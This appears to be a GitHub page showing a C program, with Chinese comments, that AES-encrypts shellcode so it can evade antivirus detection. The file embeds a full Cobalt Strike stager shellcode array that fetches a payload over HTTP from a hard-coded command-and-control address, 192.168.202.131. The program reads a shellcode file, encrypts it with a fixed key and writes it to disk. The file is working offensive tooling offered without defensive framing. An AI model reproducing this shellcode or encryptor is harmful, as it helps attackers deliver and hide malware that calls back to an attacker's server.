FilesExpand file tree

 master

/

EncryptShellCode.c

Copy path

BlameMore file actions

BlameMore file actions

Latest commit

 

History

History

History

89 lines (72 loc) · 5.25 KB

 master

/

EncryptShellCode.c

Top

File metadata and controls

• Code
• Blame

89 lines (72 loc) · 5.25 KB

Raw

Copy raw file

Download raw file

Open symbols panel

Edit and raw actions

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

#include <stdio.h>

#include <windows.h>

#include "WjCryptLib_Aes.h"

//AES密钥

uint8_t Key128[16] = { 0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c };

//cs shellcode

unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x4c\x44\x6b\x61\x00\x45\x1d\xc9\xc9\xef\x3d\xa5\x27\x9d\x96\xb1\xb5\xba\x38\x33\x8a\xf0\x6d\xe7\x2a\x6f\xdb\x6d\x1b\x9e\xa9\x55\xfc\xba\xd1\x96\xb9\x8f\xe1\x09\x27\xd5\x5c\x07\x55\x0a\x6b\xe7\xae\x80\xd3\xea\xed\x63\x92\xc9\x3e\x11\x52\x10\x95\x07\x9e\x32\xe0\x96\xce\xd4\x07\xa9\xe2\xc6\x75\x42\xdf\x6a\x57\xc7\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x0d\x0a\x00\x66\x00\x03\xae\xfe\x61\x87\x1b\x4f\x30\x18\x7f\xa2\xc5\x61\x12\x4a\x4e\xfa\x37\x94\x45\x47\x41\x07\x9b\xe0\x17\x91\x2d\x42\xe0\x44\x8d\x8f\x4e\xde\x34\xb8\x5f\xf7\xef\x9d\x63\xe4\x49\xc5\x1d\xf4\x1d\x68\x7a\x90\xc3\xea\xd2\x7e\x5f\x94\x4f\x66\xcb\xc0\xa3\x60\xa2\xc7\x56\x3a\xec\x58\x48\x47\x1c\x06\x65\xdc\x11\xbe\xf8\xed\x34\x6b\xb5\xd1\x31\x26\xcf\x37\xbe\xd3\x92\xe0\x45\x17\x18\x4e\x13\xaa\x8e\xbf\xe9\x66\x5a\x58\xf1\x43\xf5\xc3\xe9\x79\xdb\xd8\xe2\xfd\xa6\x72\x81\xce\x3c\x64\x00\x78\x23\x2f\x83\xf5\xe1\xdd\xec\x2a\xc6\x85\x8e\x6b\x20\x6d\xb0\x10\x4c\x0e\x0e\x0b\x1a\x1f\x92\x00\x26\x43\x69\x8a\xc7\xfb\x5a\xbe\x72\x91\x2a\x8b\x46\x48\x28\x29\x0a\x4d\x50\x8c\x38\xf7\xcb\x1a\xd2\xbf\x00\xad\xc0\xca\xb4\x2e\x98\x67\x01\x29\x85\x65\xbc\x2a\xe8\x04\xe1\xbf\x18\xbd\x0f\xf8\x92\x84\x2e\x26\x84\x89\x9f\x36\x11\x7e\x95\xa1\x1c\xe1\xfa\x35\xb3\x42\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x32\x30\x32\x2e\x31\x33\x31\x00\x51\x09\xbf\x6d";

int main(int argc, char* argv[]) {

//加密保存在文件的shellcode

HANDLE hFile = CreateFile("D:\\11.bin", GENERIC_READ, 0, NULL, OPEN_ALWAYS, 0, NULL);

if (hFile == INVALID_HANDLE_VALUE)

{

printf("Error");

return -1;

}

DWORD dwSize;

dwSize = GetFileSize(hFile, NULL);

LPVOID lpAddress = VirtualAlloc(NULL, dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (lpAddress == NULL)

{

printf("Error");

return -1;

}

RtlZeroMemory(lpAddress, dwSize);

//读内容

DWORD dwRead;

ReadFile(hFile, lpAddress, dwSize, &dwRead, 0);

//申请新空间

DWORD lpEncryptSize = dwRead % 0x10 ? dwRead / 0x10 * 0x10 + 0x10 : dwRead / 0x10 * 0x10;

LPVOID lpEncryptAddress = VirtualAlloc(NULL, lpEncryptSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

if (lpEncryptAddress == NULL)

{

printf("Error");

return -1;

}

RtlZeroMemory(lpEncryptAddress, lpEncryptSize);

//循环加密16字节，直到源文件结束

AesContext mAesContext;

AesInitialise(&mAesContext, Key128, AES_KEY_SIZE_128);

DWORD i = 0;

while (dwSize > 0)

{

AesEncrypt(&mAesContext, (uint8_t*)lpAddress +i*0x10, (uint8_t*)lpEncryptAddress+i*0x10);

dwSize -= 0x10;

i++;

}

/* 加密 CS的shellcode

LPVOID lpBuff = VirtualAlloc(NULL, 801, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

//循环加密16字节，直到源文件结束

AesContext mAesContext;

AesInitialise(&mAesContext, Key128, AES_KEY_SIZE_128);

DWORD i = 0;

DWORD dwSize = 800;

while (dwSize > 0)

{

AesEncrypt(&mAesContext, (uint8_t*)buf + i * 0x10, (uint8_t*)lpBuff + i * 0x10);

dwSize -= 0x10;

i++;

}

*/

//保存新的加密文件

HANDLE hEncryptFile = CreateFile("D:\\2_msg.bin", GENERIC_ALL, 0, NULL, CREATE_NEW, 0, NULL);

if (hEncryptFile == INVALID_HANDLE_VALUE)

{

printf("Error");

return -1;

}

DWORD dwWriteEncryptData = 0;

//WriteFile(hEncryptFile, lpEncryptAddress, 800,&dwWriteEncryptData,NULL);

WriteFile(hEncryptFile, lpEncryptAddress, lpEncryptSize, &dwWriteEncryptData, NULL);

return 0;

}